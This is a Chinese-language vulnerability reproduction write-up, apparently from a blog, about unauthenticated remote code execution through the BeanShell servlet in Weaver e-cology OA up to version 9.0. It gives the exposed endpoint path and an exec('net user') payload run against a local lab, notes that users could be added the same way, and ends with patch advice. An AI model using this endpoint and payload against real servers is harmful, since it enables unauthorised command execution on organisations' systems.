泛微e-cology OA Beanshell組件遠程代碼執行漏洞復現

1.泛微e-cology OA簡介

泛微e-cologyOA協同商務系統是專爲大中型企業製作的OA辦公系統,它支持PC端、移動端和微信端同時辦公,其內置了大量智能化辦公工具,使得各部門之間的協作變得暢通而又簡單。總而言之,它是一個辦公系統。

2.漏洞概述
2019年9月17日,泛微OA更新了一個安全問題,修復了一個遠程代碼執行漏洞。泛微 e-cology OA 系統自帶 BeanShell 組件且開放未授權訪問,攻擊者調用 BeanShell 組件接口可直接在目標服務器上執行任意命令。
漏洞影響的版本:泛微e-cology <= 9.0

3.漏洞復現

  1. 打開xampp軟件,將weaver.war包複製webapps目錄下,然後啓動xampp的xampp-control。
    在這裏插入圖片描述

  2. 啓動tomcat,如圖
    在這裏插入圖片描述

  3. 訪問本地環境
    http://127.0.0.1:8080/weaver/

在這裏插入圖片描述
至此,本地環境搭建完成。

4.漏洞利用

  1. 點擊Go to the BeanShell servle跳轉到BeanShell組件遠程代碼執行觸發頁面。
http://127.0.0.1:8080/weaver/bsh.servlet.BshServlet

在這裏插入圖片描述

  1. 執行系統命令 net user 查看當前系統所有用戶,或者可以直接添加用戶。
    exec("net user");
    在這裏插入圖片描述

5.漏洞修復

泛微e-cology OA系統爲商業軟件,可直接聯繫官方取得安全升級方案;在官方安全補丁發佈之前,臨時關停BeanShell接口或關閉網站對外訪問。
安全補丁下載:https://www.weaver.com.cn/cs/securityDownload.asp

6.參考鏈接
https://www.77169.net/html/243215.html
https://www.cnblogs.com/Oran9e/p/11566824.html
https://help.aliyun.com/noticelist/articleid/1060057523.html
https://beanshell.github.io/

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章